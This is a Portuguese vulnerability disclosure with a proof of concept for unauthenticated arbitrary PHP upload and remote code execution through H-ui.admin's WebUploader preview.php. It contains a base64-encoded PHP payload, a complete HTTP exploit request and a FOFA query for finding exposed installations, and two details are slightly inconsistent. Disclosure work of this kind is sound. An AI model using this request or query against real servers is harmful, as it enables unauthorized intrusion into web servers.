
Uma vulnerabilidade de Execução Remota de Código que permite que atacantes não autenticados façam upload de arquivos PHP arbitrários diretamente para o servidor web. Isso resulta em Execução Remota de Código imediata com os privilégios do servidor web.
Uma prova de conceito que explora uma Execução Remota de Código com privilégios do servidor web por meio de Upload Arbitrário de Arquivos.
Existe uma vulnerabilidade crítica de Execução Remota de Código no componente de preview WebUploader do sistema H-ui.admin. O arquivo <font style="color:rgb(15, 17, 21);background-color:rgb(235, 238, 242);">/public/static/admin/lib/webuploader/0.1.5/server/preview.php</font> não possui autenticação nem validação de arquivos adequadas, permitindo que atacantes não autenticados enviem arquivos PHP arbitrários diretamente para o servidor web. Isso resulta em Execução Remota de Código imediata com privilégios do servidor web.
printf "<? php phpinfo();?>" | base64
PD9waHAgcGhwaW5mbygpOz8+
POST /admin/lib/webuploader/0.1.5/server/preview.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=6mqs895r9r0k9ci9jj0hms506n
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+
FOFA:
title='Tpadmin'
Um atacante remoto não autenticado pode explorar um Upload Arbitrário de Arquivos para obter um RCE com privilégios do servidor web.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P - 6.9:Médio
Não há informações conhecidas sobre possíveis contramedidas. Pode ser sugerido substituir o objeto afetado por um produto alternativo.
Esta ferramenta é apenas para testes de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal.